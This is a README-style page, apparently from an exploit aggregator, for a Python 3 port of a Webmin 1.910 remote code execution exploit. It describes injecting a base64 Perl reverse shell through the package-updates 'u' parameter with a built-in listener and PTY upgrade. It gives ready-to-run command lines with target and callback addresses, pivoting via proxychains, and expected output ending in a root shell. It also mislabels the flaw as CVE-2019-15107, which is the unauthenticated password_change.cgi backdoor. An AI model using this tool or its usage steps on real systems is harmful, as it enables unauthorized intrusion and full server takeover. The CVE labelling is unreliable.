Exploit for OS Command Injection in Webmin CVE-2019-15107

## https://sploitus.com/exploit?id=E60D5B9E-1B7B-5BE1-BD7A-A7A8656F9EDF
# Webmin 1.910 — Remote Code Execution

```
 ██╗  ██╗███╗   ██╗██╗   ██╗██╗  ██╗██████╗
 ██║  ██║████╗  ██║██║   ██║╚██╗██╔╝██╔══██╗
 ███████║██╔██╗ ██║██║   ██║ ╚███╔╝ ██║  ██║
 ╚════██║██║╚██╗██║██║   ██║ ██╔██╗ ██║  ██║
      ██║██║ ╚████║╚██████╔╝██╔╝ ██╗██████╔╝
      ╚═╝╚═╝  ╚═══╝ ╚═════╝ ╚═╝  ╚═╝╚═════╝
```

> **Original exploit by [roughiz](https://github.com/roughiz)**  
> **Enhanced & ported to Python 3 by 4nuxd**

---

## Overview

This is a Python 3 port and enhancement of the original Webmin 1.910 Remote Code Execution exploit by **roughiz**. The vulnerability abuses the **Package Updates** module (`/package-updates/update.cgi`) to inject and execute arbitrary OS commands via an authenticated session.

- **CVE:** CVE-2019-15107
- **Affected Version:** Webmin ≤ 1.910
- **Auth required:** Yes (valid credentials)
- **Module:** Package Updates (`package-updates/update.cgi`)

---

## What's New in this Version

| Feature | Original | This version |
|---|---|---|
| Python version | Python 2 | Python 3 |
| Listener | External `nc` required | Built-in TCP listener |
| Shell stability | Raw dumb shell | Auto PTY upgrade |
| TTY size | Manual | Auto-detected from terminal |
| Ctrl+C passthrough | Kills script | Works correctly |
| Tab completion | Broken | Works |

---

## How It Works

1. Authenticates to Webmin via `session_login.cgi` and retrieves a session cookie
2. Crafts a Perl reverse shell payload, base64-encodes it, and injects it via the `u` parameter of `update.cgi`
3. The built-in listener catches the incoming connection
4. Automatically upgrades the dumb shell to a full PTY using `python3/python/script`
5. Sets correct terminal dimensions (`stty rows/cols`) and `TERM=xterm`
6. Drops you into a stable, fully interactive shell

---

## Requirements

```bash
pip install requests termcolor
```

Python 3.6+ required.

---

## Usage

```bash
python3 webmin_exploit_py3.py --rhost  --lhost  -p  [options]
```

### Arguments

| Argument | Description | Default |
|---|---|---|
| `--rhost` | Target IP address | *(required)* |
| `--rport` | Target Webmin port | `10000` |
| `--lhost` | Your IP for reverse shell callback | *(required)* |
| `--lport` | Your listener port | `4444` |
| `-u` / `--user` | Webmin username | `admin` |
| `-p` | Webmin password | *(required)* |
| `-t` | Base URI path | `/` |
| `-s` / `--SSL` | Use HTTPS (`true`/`false`) | `false` |

### Example

```bash
# Standard HTTP
python3 webmin_exploit_py3.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543

# With SSL
python3 webmin_exploit_py3.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543 -s true

# Through proxychains (HTB / pivot)
proxychains python3 webmin_exploit_py3.py --rhost 172.16.1.17 --lhost 10.10.14.2 --lport 1234 -u admin -p Password6543
```

---

## Expected Output

```
[*] Target   : http://172.16.1.17:10000/
[*] User     : admin
[*] Callback : 10.10.14.2:1234

[*] Authenticating...
[+] Got session cookie: abc123xyz

[*] Listening on 10.10.14.2:1234 ...
[*] Firing payload...
[+] Shell received from 172.16.1.17:54321
[+] TTY upgraded. Stable interactive shell ready.

root@webmin:~#
```

---

## Troubleshooting

**Authentication failed**
- Double-check credentials
- Try adding `-s true` if the server redirects to HTTPS

**Listener times out**
- Confirm `--lhost` is reachable from the target (use your VPN/tun0 IP on HTB)
- Check firewall rules on your machine: `sudo ufw allow `
- If pivoting, make sure proxychains is configured correctly

**Shell received but no prompt**
- Wait 2–3 seconds — PTY upgrade takes a moment
- Press Enter once to trigger the prompt

---

## Disclaimer

This tool is intended **for authorized security testing only** — CTF platforms and environments where you have explicit written permission.

Unauthorized use against systems you do not own or have permission to test is **illegal**.

---

## Credits

| Role | Handle |
|---|---|
| Original exploit author | [roughiz](https://github.com/roughiz) |
| Python 3 port & enhancements | 4nuxd |

---

## References

- [CVE-2019-15107 — NVD](https://nvd.nist.gov/vuln/detail/CVE-2019-15107)
- [Exploit-DB #47230](https://www.exploit-db.com/exploits/47230)
- [Webmin Advisory](http://www.webmin.com/security.html)